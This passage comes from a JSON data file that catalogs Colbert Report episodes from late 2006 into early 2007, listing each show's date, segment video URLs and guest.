        "http://thecolbertreport.cc.com/videos/r7b7p1/will-power",
        "http://thecolbertreport.cc.com/videos/j44oq1/sign-off---bust"
      ],
      "guest": "Will Power"
    },
    {
      "date": "2006-09-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/spzrjp/intro---9-19-06",
        "http://thecolbertreport.cc.com/videos/dbmjaj/u-n--week",
        "http://thecolbertreport.cc.com/videos/5v40iy/the-word---tribalism",
        "http://thecolbertreport.cc.com/videos/qloab5/threatdown---toby-keith",
        "http://thecolbertreport.cc.com/videos/kf8re4/frank-rich",
        "http://thecolbertreport.cc.com/videos/ezwrh0/sign-off---fantasy-colbert-report-league"
      ],
      "guest": "Frank Rich"
    },
    {
      "date": "2006-09-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lj5z86/green-screen-challenge---the-challenge-continues",
        "http://thecolbertreport.cc.com/videos/o1qorx/who-s-not-honoring-me-now----the-macarthur-foundation",
        "http://thecolbertreport.cc.com/videos/pz60rq/green-screen-challenge---typical-democrats",
        "http://thecolbertreport.cc.com/videos/vkr39r/stephen-s-sound-advice---high-school",
        "http://thecolbertreport.cc.com/videos/fn9d5q/james-carville",
        "http://thecolbertreport.cc.com/videos/g7hl0x/the-word---lose"
      ],
      "guest": "James Carville"
    },
    {
      "date": "2006-09-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yujezq/intro---9-21-06",
        "http://thecolbertreport.cc.com/videos/tvrtdg/days-of-repentance-hotline",
        "http://thecolbertreport.cc.com/videos/kxvydq/better-know-a-challenger---new-jersey-s-5th---paul-aronsohn",
        "http://thecolbertreport.cc.com/videos/u1txo4/daniel-ellsberg",
        "http://thecolbertreport.cc.com/videos/42tk7e/sign-off---pentagon-papers",
        "http://thecolbertreport.cc.com/videos/yxzh84/daniel-golden"
      ],
      "guest": "Daniel Ellsberg"
    },
    {
      "date": "2006-09-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ubu45l/intro---9-25-06",
        "http://thecolbertreport.cc.com/videos/918nqn/heritage",
        "http://thecolbertreport.cc.com/videos/s08yij/buy-this-book",
        "http://thecolbertreport.cc.com/videos/1tds5k/the-word---opposition-party",
        "http://thecolbertreport.cc.com/videos/az74i4/green-screen-challenge---goodbye--darth-maul-",
        "http://thecolbertreport.cc.com/videos/te8evq/fun-in-the-sun",
        "http://thecolbertreport.cc.com/videos/c88j0x/arianna-huffington"
      ],
      "guest": "Arianna Huffington"
    },
    {
      "date": "2006-09-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/13qtu2/intro---9-26-06",
        "http://thecolbertreport.cc.com/videos/76ov53/frank-rich-calls-in",
        "http://thecolbertreport.cc.com/videos/navjpx/the-word---good-morning",
        "http://thecolbertreport.cc.com/videos/22kzkk/four-horsemen-of-the-a-pop-calypse---justin-timberlake",
        "http://thecolbertreport.cc.com/videos/kertmr/ted-danson",
        "http://thecolbertreport.cc.com/videos/en1nzg/alpha-dog-of-the-week---tom-selleck"
      ],
      "guest": "Ted Danson"
    },
    {
      "date": "2006-09-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dkn6is/intro---9-27-06",
        "http://thecolbertreport.cc.com/videos/w75za8/oprah-and-friends",
        "http://thecolbertreport.cc.com/videos/2zj0db/mort-zuckerman-dials-the-atone-phone",
        "http://thecolbertreport.cc.com/videos/wq2mkf/the-word---iraq",
        "http://thecolbertreport.cc.com/videos/p20mpr/tip-wag---george-clooney",
        "http://thecolbertreport.cc.com/videos/g1anyj/lowell-bergman",
        "http://thecolbertreport.cc.com/videos/8v25i1/sign-off---world-of-colbertcraft"
      ],
      "guest": "Lowell Bergman"
    },
    {
      "date": "2006-09-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b0od22/intro---9-28-06",
        "http://thecolbertreport.cc.com/videos/mechk8/green-screen-challenge---ipod---colbert",
        "http://thecolbertreport.cc.com/videos/jl58qd/blitzkrieg-on-grinchitude---santa-claus--in",
        "http://thecolbertreport.cc.com/videos/a23i2j/jon-stewart-calls-in",
        "http://thecolbertreport.cc.com/videos/kby4hb/un-american-news---spain",
        "http://thecolbertreport.cc.com/videos/c2vyau/steve-wozniak"
      ],
      "guest": "Steve Wozniak"
    },
    {
      "date": "2006-10-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vaflyc/intro---10-2-06",
        "http://thecolbertreport.cc.com/videos/ak0wmf/mark-foley",
        "http://thecolbertreport.cc.com/videos/clzwmu/the-word---copycat",
        "http://thecolbertreport.cc.com/videos/0f7zu5/threatdown---saudi-arabia",
        "http://thecolbertreport.cc.com/videos/6cuxj4/michael-lewis",
        "http://thecolbertreport.cc.com/videos/gwcer9/sign-off---actual-apologies"
      ],
      "guest": "Michael Lewis"
    },
    {
      "date": "2006-10-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fkksjm/intro---10-3-06",
        "http://thecolbertreport.cc.com/videos/85po0w/drunk-dialing",
        "http://thecolbertreport.cc.com/videos/hnt52c/lucifer",
        "http://thecolbertreport.cc.com/videos/ap05bd/the-word---experience",
        "http://thecolbertreport.cc.com/videos/oojn49/steagle-colbeagle-the-eagle---mascot",
        "http://thecolbertreport.cc.com/videos/xqpdbq/andy-stern",
        "http://thecolbertreport.cc.com/videos/tbnr4f/sign-off---retire-the-jersey"
      ],
      "guest": "Andy Stern"
    },
    {
      "date": "2006-10-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pi53om/intro---10-4-06",
        "http://thecolbertreport.cc.com/videos/t3hp8a/mark-foley-the-rino",
        "http://thecolbertreport.cc.com/videos/2n2oat/the-word---must-not-see-tv",
        "http://thecolbertreport.cc.com/videos/536mbt/nobel-prize-sweep",
        "http://thecolbertreport.cc.com/videos/ga8yja/green-screen-challenge---d-d",
        "http://thecolbertreport.cc.com/videos/ps5fh4/byron-dorgan",
        "http://thecolbertreport.cc.com/videos/vbbgif/-20-million-victory-party"
      ],
      "guest": "Byron Dorgan"
    },
    {
      "date": "2006-10-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r5fn7m/intro---10-5-06",
        "http://thecolbertreport.cc.com/videos/t7lg5x/handling-sex-scandals",
        "http://thecolbertreport.cc.com/videos/2pcxy7/behavioral-profiling",
        "http://thecolbertreport.cc.com/videos/6qs8dt/maz-jobrani",
        "http://thecolbertreport.cc.com/videos/8vhk9f/better-know-a-district---florida-s-16th---mark-foley",
        "http://thecolbertreport.cc.com/videos/cg4ud6/amy-goodman",
        "http://thecolbertreport.cc.com/videos/mex37x/starbucks-price-hike"
      ],
      "guest": "Amy Goodman"
    },
    {
      "date": "2006-10-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uz4y5r/intro---10-9-06",
        "http://thecolbertreport.cc.com/videos/vcdu14/stephen-greets-kim-jong-il",
        "http://thecolbertreport.cc.com/videos/94jsyv/the-word---safety",
        "http://thecolbertreport.cc.com/videos/oqybt6/sport-report---saginaw-spirit-3-0-with-steagle-colbeagle",
        "http://thecolbertreport.cc.com/videos/sxcbbt/randy-newman"
      ],
      "guest": "Randy Newman"
    },
    {
      "date": "2006-10-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7x9ixq/a-salute-to-the-american-lady",
        "http://thecolbertreport.cc.com/videos/2jugk2/stephen-r-a-p-s----gender-issues",
        "http://thecolbertreport.cc.com/videos/tab5oc/jane-fonda-and-gloria-steinem",
        "http://thecolbertreport.cc.com/videos/vglnl3/ariel-levy",
        "http://thecolbertreport.cc.com/videos/6ooly1/sign-off---mrs--colbert"
      ],
      "guest": "Ariel Levy"
    },
    {
      "date": "2006-10-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m063rn/intro---10-11-06",
        "http://thecolbertreport.cc.com/videos/bmktr8/shout-out----from-baghdad-to-the-report",
        "http://thecolbertreport.cc.com/videos/lbop8f/stephen-cashes-in",
        "http://thecolbertreport.cc.com/videos/kpo74v/green-screen-challenge---the-final-cut",
        "http://thecolbertreport.cc.com/videos/fxyspp/green-screen-challenge---the-finalists",
        "http://thecolbertreport.cc.com/videos/n67d6e/green-screen-challenge---the-winner",
        "http://thecolbertreport.cc.com/videos/pkbxv2/tek-jansen---space-station-theta-zeus-aquarius",
        "http://thecolbertreport.cc.com/videos/8hq3dq/lightsaber-duel",
        "http://thecolbertreport.cc.com/videos/nkr8wo/green-screen---george-lucas"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2006-10-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d5jz3y/exclusive---better-know-a-challenger---new-jersey-s-4th---carol-gay",
        "http://thecolbertreport.cc.com/videos/yw8t41/intro---10-12-06",
        "http://thecolbertreport.cc.com/videos/dikrto/congratulatory-mail",
        "http://thecolbertreport.cc.com/videos/9dfgke/north-korean-weapons-test-scare",
        "http://thecolbertreport.cc.com/videos/htaz1s/gay-republicans---andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/gtnan5/better-know-a-challenger---new-jersey-s-4th---carol-gay",
        "http://thecolbertreport.cc.com/videos/f57spg/brian-schweitzer",
        "http://thecolbertreport.cc.com/videos/o1sfrf/sign-off---revved-up"
      ],
      "guest": "Larry Miller"
    },
    {
      "date": "2006-10-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/plp18s/intro---10-16-06",
        "http://thecolbertreport.cc.com/videos/q81oyv/bush-impersonator-impersonator",
        "http://thecolbertreport.cc.com/videos/3yuat5/cbgb-s",
        "http://thecolbertreport.cc.com/videos/7i1kaz/the-word---russian-dolls",
        "http://thecolbertreport.cc.com/videos/rxjbs7/tip-wag---midterm-elections-edition",
        "http://thecolbertreport.cc.com/videos/2he8tk/barry-scheck",
        "http://thecolbertreport.cc.com/videos/xuvjmp/the-wave"
      ],
      "guest": "Barry Scheck"
    },
    {
      "date": "2006-10-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ae5ru6/intro---10-17-06",
        "http://thecolbertreport.cc.com/videos/fo3bt3/one-year-anniversary",
        "http://thecolbertreport.cc.com/videos/r8tksi/descending-screen",
        "http://thecolbertreport.cc.com/videos/18nq18/the-word---irreconcilable-differences",
        "http://thecolbertreport.cc.com/videos/hlfrbf/anniversary-cake",
        "http://thecolbertreport.cc.com/videos/is87vo/judge-tubbs",
        "http://thecolbertreport.cc.com/videos/7fe2ut/richard-dawkins",
        "http://thecolbertreport.cc.com/videos/g41j5d/second-year-portrait"
      ],
      "guest": "Richard Dawkins"
    },
    {
      "date": "2006-10-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nm42tm/intro---10-18-06",
        "http://thecolbertreport.cc.com/videos/szo4co/elephant-vasectomies",
        "http://thecolbertreport.cc.com/videos/bl7nra/the-word---sherlock",
        "http://thecolbertreport.cc.com/videos/jpgqk0/jeopardy",
        "http://thecolbertreport.cc.com/videos/wu6d7x/sport-report---smack-talk",
        "http://thecolbertreport.cc.com/videos/0usw0u/david-kuo",
        "http://thecolbertreport.cc.com/videos/pun0an/santorum-s-iraqi-lord-of-the-rings"
      ],
      "guest": "Deepak Chopra"
    },
    {
      "date": "2006-10-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/63h5y0/exclusive---better-know-a-challenger---new-york-s-19th---john-hall",
        "http://thecolbertreport.cc.com/videos/simwwd/intro---10-19-06",
        "http://thecolbertreport.cc.com/videos/zzoxmj/ebay-portrait-bid",
        "http://thecolbertreport.cc.com/videos/55o9xl/jim-gilchrist",
        "http://thecolbertreport.cc.com/videos/eh02b8/better-know-a-challenger---new-york-s-19th---john-hall",
        "http://thecolbertreport.cc.com/videos/484q7z/peter-agre"
      ],
      "guest": "Matthew Dowd"
    },
    {
      "date": "2006-10-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xsr78j/intro---10-30-06",
        "http://thecolbertreport.cc.com/videos/501yrw/get-ready-for-barry",
        "http://thecolbertreport.cc.com/videos/fokcta/stay-the-course",
        "http://thecolbertreport.cc.com/videos/2ffwy9/the-word---shameless",
        "http://thecolbertreport.cc.com/videos/3644s2/threatdown---greatdown",
        "http://thecolbertreport.cc.com/videos/h5ly2o/barry-manilow"
      ],
      "guest": "Barry Manilow"
    },
    {
      "date": "2006-10-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vll3lh/intro---10-31-06",
        "http://thecolbertreport.cc.com/videos/ixb36k/costumes-for-the-girls",
        "http://thecolbertreport.cc.com/videos/qrw2en/the-word---thanks--gays-",
        "http://thecolbertreport.cc.com/videos/ya17xq/portrait-auction",
        "http://thecolbertreport.cc.com/videos/crxtpi/welcome-to-the-house-of-horrors---nancy-pelosi",
        "http://thecolbertreport.cc.com/videos/2g6dhj/tim-robbins",
        "http://thecolbertreport.cc.com/videos/9z7u1s/freak-show---log-cabin-republican"
      ],
      "guest": "Tim Robbins"
    },
    {
      "date": "2006-11-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fio9x5/exclusive---better-know-a-challenger---california-s-30th---david-nelson-jones",
        "http://thecolbertreport.cc.com/videos/ngeqml/intro---11-1-06",
        "http://thecolbertreport.cc.com/videos/07l6jg/john-kerry",
        "http://thecolbertreport.cc.com/videos/5a62pu/the-word---rip-off",
        "http://thecolbertreport.cc.com/videos/j449s5/better-know-a-challenger---california-s-30th---david-nelson-jones",
        "http://thecolbertreport.cc.com/videos/80bjyk/penn-jillette",
        "http://thecolbertreport.cc.com/videos/7w23zw/big-in--06"
      ],
      "guest": "Penn Jillette"
    },
    {
      "date": "2006-11-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c1jp7z/intro---11-2-06",
        "http://thecolbertreport.cc.com/videos/ryl8xd/a-historidocufictiomentary-of-george-allen",
        "http://thecolbertreport.cc.com/videos/ypv3hz/p-k--winsome---black-republican",
        "http://thecolbertreport.cc.com/videos/e8pbai/sport-report---the-spirit-shop",
        "http://thecolbertreport.cc.com/videos/o5x0ja/chad-walldorf--portrait-winner",
        "http://thecolbertreport.cc.com/videos/vchsrw/ron-reagan"
      ],
      "guest": "Ron Reagan Jr."
    },
    {
      "date": "2006-11-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5l9ww2/intro---11-6-06",
        "http://thecolbertreport.cc.com/videos/3x1o1e/saddam-s-hanging",
        "http://thecolbertreport.cc.com/videos/mfycn0/vote-your-conscience",
        "http://thecolbertreport.cc.com/videos/xjsetj/the-word---happy-ending",
        "http://thecolbertreport.cc.com/videos/yu4stw/ted-haggard-s-media-field-day",
        "http://thecolbertreport.cc.com/videos/qtoavw/what-to-expect-when-you-re-electing",
        "http://thecolbertreport.cc.com/videos/de4hy0/mark-halperin",
        "http://thecolbertreport.cc.com/videos/iuqlez/absentee-voting"
      ],
      "guest": "Mark Halperin"
    },
    {
      "date": "2006-11-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rdhken/midterm-midtacular---beatty---bening-confirmation-call",
        "http://thecolbertreport.cc.com/videos/vmt5dv/better-know-a-district---midterm-midtacular",
        "http://thecolbertreport.cc.com/videos/42n9bh/midterm-midtacular---update-from-the-daily-show",
        "http://thecolbertreport.cc.com/videos/gmknl3/midterm-midtacular---democrat-majority",
        "http://thecolbertreport.cc.com/videos/1qhm06/stephen-s-final-thoughts",
        "http://thecolbertreport.cc.com/videos/3fzd37/robert-wexler-and-eleanor-holmes-norton"
      ],
      "guest": "Election Night Live Show"
    },
    {
      "date": "2006-11-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/veyf2a/intro---11-8-06",
        "http://thecolbertreport.cc.com/videos/0085n8/the-word---sigh",
        "http://thecolbertreport.cc.com/videos/8tjdnz/better-know-a-district---new-york-s-19th---john-hall",
        "http://thecolbertreport.cc.com/videos/n1c32a/tek-jansen---theme-song",
        "http://thecolbertreport.cc.com/videos/vzb4w6/jeff-greenfield",
        "http://thecolbertreport.cc.com/videos/3yplp6/special-memories"
      ],
      "guest": "Jeff Greenfield"
    },
    {
      "date": "2006-11-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vsle8s/intro---11-9-06",
        "http://thecolbertreport.cc.com/videos/ec6t9w/shout-out----michael-rehm",
        "http://thecolbertreport.cc.com/videos/0osdbo/the-word---putin--08",
        "http://thecolbertreport.cc.com/videos/ro28cv/p-k--winsome---a-journey-home",
        "http://thecolbertreport.cc.com/videos/sff21j/dean-kamen",
        "http://thecolbertreport.cc.com/videos/y6jo9b/sign-off---buy-american"
      ],
      "guest": "Dean Kamen"
    },
    {
      "date": "2006-11-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xhi69f/intro---11-13-06",
        "http://thecolbertreport.cc.com/videos/tq9pyg/mccain-s-depression",
        "http://thecolbertreport.cc.com/videos/wze0m8/the-word---back-off--old-man",
        "http://thecolbertreport.cc.com/videos/3l0etr/tip-wag---quitters-edition",
        "http://thecolbertreport.cc.com/videos/v04ko8/dan-rather",
        "http://thecolbertreport.cc.com/videos/39thdv/alpha-dog-of-the-week---ronald-reagan"
      ],
      "guest": "Dan Rather"
    },
    {
      "date": "2006-11-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2xysq8/intro---10-14-06",
        "http://thecolbertreport.cc.com/videos/41uzjx/lesbian-roles",
        "http://thecolbertreport.cc.com/videos/njn4f1/stephen-jr--in-canada",
        "http://thecolbertreport.cc.com/videos/x9bnw7/the-word---expecting",
        "http://thecolbertreport.cc.com/videos/mx7sjh/vote-for-gail-jingle",
        "http://thecolbertreport.cc.com/videos/xokq2b/jeff-swartz",
        "http://thecolbertreport.cc.com/videos/cnxqlb/kid-activity-corner---nancy-pelosi-hand-turkeys"
      ],
      "guest": "Jeff Swartz"
    },
    {
      "date": "2006-11-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9sc11a/exclusive---better-know-a-founder---thomas-jefferson",
        "http://thecolbertreport.cc.com/videos/2xysq8/intro---10-14-06",
        "http://thecolbertreport.cc.com/videos/41uzjx/lesbian-roles",
        "http://thecolbertreport.cc.com/videos/njn4f1/stephen-jr--in-canada",
        "http://thecolbertreport.cc.com/videos/x9bnw7/the-word---expecting",
        "http://thecolbertreport.cc.com/videos/mx7sjh/vote-for-gail-jingle",
        "http://thecolbertreport.cc.com/videos/xokq2b/jeff-swartz",
        "http://thecolbertreport.cc.com/videos/cnxqlb/kid-activity-corner---nancy-pelosi-hand-turkeys"
      ],
      "guest": "Al Franken, Dr. Michael Novacek"
    },
    {
      "date": "2006-11-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zmp3r0/intro---11-15-06",
        "http://thecolbertreport.cc.com/videos/kl1xl0/rush-limbaugh-s-comments",
        "http://thecolbertreport.cc.com/videos/w5bgh2/democrats--victory-dance---al-franken",
        "http://thecolbertreport.cc.com/videos/47a505/better-know-a-founder---thomas-jefferson",
        "http://thecolbertreport.cc.com/videos/cnf5lf/mike-novacek"
      ],
      "guest": "Al Franken, Dr. Michael Novacek"
    },
    {
      "date": "2006-11-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hstabl/intro---11-16-06",
        "http://thecolbertreport.cc.com/videos/zyzp0g/minority-whip",
        "http://thecolbertreport.cc.com/videos/euzyuf/sexiest-man-alive",
        "http://thecolbertreport.cc.com/videos/olggdr/the-word---play-ball-",
        "http://thecolbertreport.cc.com/videos/oplysq/movies-that-are-destroying-america---xmas",
        "http://thecolbertreport.cc.com/videos/3il1eo/richard-linklater",
        "http://thecolbertreport.cc.com/videos/s716ap/sign-off---strawberry"
      ],
      "guest": "Richard Linklater"
    },
    {
      "date": "2006-11-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1xjoh6/intro---11-27-06",
        "http://thecolbertreport.cc.com/videos/z4h5jm/putin--08",
        "http://thecolbertreport.cc.com/videos/k3p09y/tivo-cleaning",
        "http://thecolbertreport.cc.com/videos/dg34l1/the-word---jacksquat",
        "http://thecolbertreport.cc.com/videos/ckqxms/threatdown---100-hoops",
        "http://thecolbertreport.cc.com/videos/lqdkhe/jim-lehrer",
        "http://thecolbertreport.cc.com/videos/y3zgee/sign-off---love"
      ],
      "guest": "Jim Lehrer"
    },
    {
      "date": "2006-11-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0tspod/intro---11-28-06",
        "http://thecolbertreport.cc.com/videos/47xxe1/who-s-honoring-me-now----gq",
        "http://thecolbertreport.cc.com/videos/voj40k/the-word---ecu-menace",
        "http://thecolbertreport.cc.com/videos/fenw0v/alabama-miracle---helen-keller-museum",
        "http://thecolbertreport.cc.com/videos/xi41md/harry-shearer",
        "http://thecolbertreport.cc.com/videos/iate4s/sign-off---exceptional-audience"
      ],
      "guest": "Harry Shearer"
    },
    {
      "date": "2006-11-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mr063e/intro---11-29-06",
        "http://thecolbertreport.cc.com/videos/wanzdw/who-s-riding-my-coattails-now----jeopardy",
        "http://thecolbertreport.cc.com/videos/bp43w6/the-word---killing-two-birds",
        "http://thecolbertreport.cc.com/videos/49jjmd/alabama-miracle---the-stephen-colbert-museum---gift-shop--grand-opening",
        "http://thecolbertreport.cc.com/videos/8rjs2g/nora-ephron"
      ],
      "guest": "Nora Ephron"
    },
    {
      "date": "2006-11-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wzpzqs/intro---11-30-06",
        "http://thecolbertreport.cc.com/videos/4c2tdv/vilsack-attack",
        "http://thecolbertreport.cc.com/videos/z88s3n/p-k--winsome---if-p-k--winsome-did-it",
        "http://thecolbertreport.cc.com/videos/0inrmr/colbert-nation-merchandise",
        "http://thecolbertreport.cc.com/videos/jotybg/alabama-miracle---the-morning-after",
        "http://thecolbertreport.cc.com/videos/hv1lim/mike-lupica",
        "http://thecolbertreport.cc.com/videos/k1wdp2/sign-off---wall-notch"
      ],
      "guest": "Mike Lupica"
    },
    {
      "date": "2006-12-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9s5cs9/intro---12-4-06",
        "http://thecolbertreport.cc.com/videos/ozd0a8/sherman-wedding",
        "http://thecolbertreport.cc.com/videos/sjup2k/the-word---american-orthodox",
        "http://thecolbertreport.cc.com/videos/shtpb9/tip-wag---christmas",
        "http://thecolbertreport.cc.com/videos/tc5d1m/will-wright",
        "http://thecolbertreport.cc.com/videos/xpx8ua/sign-off---extra-special-comment---tie-stain"
      ],
      "guest": "Will Wright"
    },
    {
      "date": "2006-12-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z40k91/intro---12-5-06",
        "http://thecolbertreport.cc.com/videos/6ixmt6/-return--to-the-moon",
        "http://thecolbertreport.cc.com/videos/mz0h4p/robert-gates--confirmation",
        "http://thecolbertreport.cc.com/videos/msrwcg/the-word---honest-injun",
        "http://thecolbertreport.cc.com/videos/3odbkp/sport-report---coach-mancini",
        "http://thecolbertreport.cc.com/videos/tjdbeu/sign-off---number-one-source",
        "http://thecolbertreport.cc.com/videos/c1sa92/steven-levitt"
      ],
      "guest": "Steven D. Leavitt"
    },
    {
      "date": "2006-12-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fe08hq/intro---12-6-06",
        "http://thecolbertreport.cc.com/videos/oamjbp/life-size-nativity",
        "http://thecolbertreport.cc.com/videos/ikcmp0/mary-cheney",
        "http://thecolbertreport.cc.com/videos/4fr9o9/the-word---words",
        "http://thecolbertreport.cc.com/videos/76wnkt/tek-jansen---tek-the-halls",
        "http://thecolbertreport.cc.com/videos/0wqkww/john-sexton",
        "http://thecolbertreport.cc.com/videos/8suoui/sign-off---cardboard-box"
      ],
      "guest": "John Sexton"
    },
    {
      "date": "2006-12-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/k9wcbv/intro---12-7-06",
        "http://thecolbertreport.cc.com/videos/ebabt9/david-gregory",
        "http://thecolbertreport.cc.com/videos/kvccyn/the-word---case-closed",
        "http://thecolbertreport.cc.com/videos/tk750r/elizabeth-de-la-vega",
        "http://thecolbertreport.cc.com/videos/dntxcy/green-screen-challenge---counter-challenge",
        "http://thecolbertreport.cc.com/videos/4koanp/alpha-dog-of-the-week---john-bolton",
        "http://thecolbertreport.cc.com/videos/dqyz7h/francis-collins",
        "http://thecolbertreport.cc.com/videos/rqe98q/sign-off---tgit"
      ],
      "guest": "Dr. Francis S. Collins"
    },
    {
      "date": "2006-12-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ri4vbo/intro---12-11-06",
        "http://thecolbertreport.cc.com/videos/t0abnh/defending-rosie",
        "http://thecolbertreport.cc.com/videos/uea9ov/jack-kingston",
        "http://thecolbertreport.cc.com/videos/k0a3hu/the-white-christmas-album",
        "http://thecolbertreport.cc.com/videos/2cea2e/threatdown---christmas-style",
        "http://thecolbertreport.cc.com/videos/bqpkoy/peter-singer",
        "http://thecolbertreport.cc.com/videos/5alg6c/got-your-back"
      ],
      "guest": "Dr. Peter Singer"
    },
    {
      "date": "2006-12-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/35u0ts/intro---12-12-06",
        "http://thecolbertreport.cc.com/videos/kn0mlp/augusto-pinochet-s-coup",
        "http://thecolbertreport.cc.com/videos/dctycd/shout-out----beef-hammer-flag",
        "http://thecolbertreport.cc.com/videos/1o4xvk/the-word---casualty-of-war",
        "http://thecolbertreport.cc.com/videos/e1504w/who-s-honoring-me-now----merriam-webster-s-word-of-the-year",
        "http://thecolbertreport.cc.com/videos/xd9itr/better-know-a-district---new-members-of-congress-at-the-kennedy-school",
        "http://thecolbertreport.cc.com/videos/j01zz1/dan-savage",
        "http://thecolbertreport.cc.com/videos/s3gs7u/sign-off---post-show-taco-bell-chalupa-chow-down"
      ],
      "guest": "Dan Savage"
    },
    {
      "date": "2006-12-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6ohkja/intro---12-13-06",
        "http://thecolbertreport.cc.com/videos/yl018s/stephen-jr--s-christmas-miracle",
        "http://thecolbertreport.cc.com/videos/suc40d/the-word---it-s-a-small-world",
        "http://thecolbertreport.cc.com/videos/5uk9gs/replenishing-the-eggnog-supply",
        "http://thecolbertreport.cc.com/videos/d0ml1u/sea-tac-s-christmas-trees-restored",
        "http://thecolbertreport.cc.com/videos/x1f8dg/doris-kearns-goodwin",
        "http://thecolbertreport.cc.com/videos/0kcywr/charge-me-twice-for-stephen"
      ],
      "guest": "Doris Kearns Goodwin"
    },
    {
      "date": "2006-12-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lwojc9/intro---12-14-06",
        "http://thecolbertreport.cc.com/videos/3moulc/finger-strengthening",
        "http://thecolbertreport.cc.com/videos/5dvej7/the-american-people-are-to-blame",
        "http://thecolbertreport.cc.com/videos/60ds73/the-word---clarity",
        "http://thecolbertreport.cc.com/videos/klp05i/blood-in-the-water---bruce-tinsley-s-dui",
        "http://thecolbertreport.cc.com/videos/wauy3f/caesar-honeybee-or-tyrone-hunnibi-",
        "http://thecolbertreport.cc.com/videos/yaoen5/daniel-pinchbeck",
        "http://thecolbertreport.cc.com/videos/ua9gte/letter-to-representative-jack-kingston"
      ],
      "guest": "Daniel Pinchbeck"
    },
    {
      "date": "2006-12-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t66x66/intro---12-18-06",
        "http://thecolbertreport.cc.com/videos/j56gn9/diy-cold-medicine",
        "http://thecolbertreport.cc.com/videos/ndrsqu/profiles-in-balls",
        "http://thecolbertreport.cc.com/videos/mv0dai/the-word---the-draft",
        "http://thecolbertreport.cc.com/videos/c4vji3/tip-wag---art-edition",
        "http://thecolbertreport.cc.com/videos/nnpc32/jack-welch",
        "http://thecolbertreport.cc.com/videos/yy82av/the-jingle-terns"
      ],
      "guest": "Jack Welch"
    },
    {
      "date": "2006-12-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/an4q7j/intro---12-19-06",
        "http://thecolbertreport.cc.com/videos/q9o6sw/person-of-the-year",
        "http://thecolbertreport.cc.com/videos/qh5kz9/stephen-goes-to-harvard",
        "http://thecolbertreport.cc.com/videos/v81egv/deepak-chopra",
        "http://thecolbertreport.cc.com/videos/3fhkpv/face-off-preview",
        "http://thecolbertreport.cc.com/videos/kza2d8/the-word---tit-for-tat"
      ],
      "guest": "Deepak Chopra"
    },
    {
      "date": "2006-12-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ouau0r/intro---12-20-06",
        "http://thecolbertreport.cc.com/videos/8t5vas/rock-and-awe--countdown-to-guitarmageddon",
        "http://thecolbertreport.cc.com/videos/lyahfg/shreddown",
        "http://thecolbertreport.cc.com/videos/iocz1g/chris-funk",
        "http://thecolbertreport.cc.com/videos/4hpbzt/peter-frampton",
        "http://thecolbertreport.cc.com/videos/m75mj9/shreddown---the-judgment"
      ],
      "guest": "Howard Zinn"
    }
  ],
  "2007": [
    {
      "date": "2007-01-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/35rb23/intro---1-8-07",
        "http://thecolbertreport.cc.com/videos/liauyt/the-gallotastic-executacular---hangin--with-mr--hussein",
        "http://thecolbertreport.cc.com/videos/2eciiy/the-word---facts",
        "http://thecolbertreport.cc.com/videos/vfxu06/who-s-attacking-me-now----lake-superior-state-university",
        "http://thecolbertreport.cc.com/videos/ya0sji/who-s-honoring-me-now----gay-com",
        "http://thecolbertreport.cc.com/videos/uuhxlg/stephen-s-sound-advice---surviving-the-winter-blues",
        "http://thecolbertreport.cc.com/videos/duytly/ethan-nadelmann"
      ],
      "guest": "Ethan Nadelmann"
    },
    {
      "date": "2007-01-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oxq1cl/not-a-sex-scandal",
        "http://thecolbertreport.cc.com/videos/rsuyoo/intro---1-9-07",
        "http://thecolbertreport.cc.com/videos/a9e13e/the-word---texas-hold--em",
        "http://thecolbertreport.cc.com/videos/bmmv86/ohio-state-loses",
        "http://thecolbertreport.cc.com/videos/1yhdmp/we-the-mediator---celebrity-feuds",
